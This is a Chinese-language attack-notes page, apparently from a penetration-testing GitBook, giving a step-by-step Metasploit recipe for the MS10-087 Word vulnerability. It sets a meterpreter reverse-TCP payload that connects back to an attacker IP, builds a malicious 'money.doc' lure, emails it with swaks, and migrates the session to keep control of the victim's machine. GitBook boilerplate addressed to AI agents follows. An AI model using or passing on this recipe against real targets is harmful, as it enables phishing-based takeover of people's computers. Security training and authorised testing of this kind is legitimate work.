> For the complete documentation index, see [llms.txt](https://jon-xia.gitbook.io/workspace/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jon-xia.gitbook.io/workspace/shen-tou-ce-shi-1/gong-ji-bi-ji/windows-shen-tou.md). # 使用msf进行攻击(使用漏洞MS10-087) msf是一个专业的支持大多数漏洞攻击的工具 攻击目标为word2003主流版本和2007的部分版本 msfconsole进入控制台 查找ms10-087 set PAYLOAD windows/meterpreter/reverse\_tcp //设定攻击载荷为反弹TCP连接会话 set LHOST 192.168.250.162 //设置反弹连接目标IP set LPORT 8080 //设置反弹连接目标端口号 set FILENAME money.rtf //创建的word文档名称为money.rtf,格式必须是rtf,一会儿我们再把它改名为.doc也是可以正常执行的。 exploit //生成带攻击代码的word文档 swaks --to --from --ehlo freebuf.com --body hello --header "Subject: download" --attach money.doc 对方打开word文件,根据反弹的meterpreter就可以在控制台控制对方电脑了 但是在这时关闭文档连接就断了,这里可以用 ps 查找运行的程序 mirgate \[pid] --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jon-xia.gitbook.io/workspace/shen-tou-ce-shi-1/gong-ji-bi-ji/windows-shen-tou.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.